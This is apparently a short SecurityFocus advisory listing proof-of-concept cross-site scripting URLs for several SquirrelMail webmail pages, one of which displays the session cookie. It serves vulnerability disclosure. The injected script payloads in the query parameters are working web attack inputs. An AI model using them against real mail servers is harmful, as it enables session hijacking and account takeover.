SquirrelMail Multiple Cross Site Scripting Vulnerablities

The following proof of concepts have been provided by DarC KonQuesT:

http://<VULNERABLE
SITE>.net/webmail/src/addressbook.php?"><script>alert(document.cookie)</scri
pt><!--

http://<VULNERABLE
SITE>.net/webmail/src/options.php?optpage=<script>alert('boop!')</script>

http://<VULNERABLE
SITE>.net/webmail/src/search.php?mailbox=<script>alert('boop!')</script>&wha
t=x&where=BODY&submit=Search

http://<VULNERABLE
SITE>.net/webmail/src/search.php?mailbox=INBOX&what=x&where=<script>alert('b
oop!')</script>&submit=Search

http://<VULNERABLE
SITE>.net/webmail/src/help.php?chapter=<script>alert('boop!')</script>


 

Privacy Statement
Copyright 2010, SecurityFocus